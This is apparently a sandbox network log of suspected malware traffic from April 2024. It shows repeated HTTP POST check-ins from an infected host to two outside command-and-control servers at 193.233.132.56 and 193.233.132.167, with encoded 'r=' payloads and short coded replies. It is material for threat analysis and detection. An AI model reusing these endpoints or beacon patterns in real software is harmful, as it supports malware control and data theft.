Session ID: 1555 | Source IP: 192.168.2.5 | Source Port: 51411 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:06.399560928 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:06.647248030 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1556 | Source IP: 192.168.2.5 | Source Port: 51412 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:06.451627016 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:37:06.706655979 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1557 | Source IP: 192.168.2.5 | Source Port: 51414 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:06.993541956 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:07.241133928 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1558 | Source IP: 192.168.2.5 | Source Port: 51415 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:07.042510986 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:07.291069984 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1559 | Source IP: 192.168.2.5 | Source Port: 51416 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:07.499102116 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:37:07.752321959 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1560 | Source IP: 192.168.2.5 | Source Port: 51417 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:07.551675081 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:37:07.808195114 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1561 | 192.168.2.5 | 51418 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:08.070677996 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:08.314866066 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1562 | 192.168.2.5 | 51419 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:08.141558886 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:08.387972116 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1563 | 192.168.2.5 | 51420 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:08.567603111 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:08.821990013 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1564 | 192.168.2.5 | 51421 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:08.642147064 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:08.895287037 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1565 | 192.168.2.5 | 51422 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:09.141503096 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:09.390805960 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1566 | 192.168.2.5 | 51423 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:09.227164984 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:09.473256111 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1567 | 192.168.2.5 | 51424 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:09.642395020 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:09.893414974 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1568 | 192.168.2.5 | 51425 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:09.721116066 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:09.969913006 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1569 | 192.168.2.5 | 51426 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:10.211538076 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:10.458998919 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1570 | 192.168.2.5 | 51427 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:10.304650068 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:10.553359985 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1571 | 192.168.2.5 | 51428 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:10.702375889 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:10.944757938 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1572 | 192.168.2.5 | 51429 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:10.799377918 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:11.044140100 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1573 | 192.168.2.5 | 51430 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:11.275806904 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:11.523113012 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1574 | Source IP: 192.168.2.5 | Source Port: 51431 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:11.374311924 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:11.626435041 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


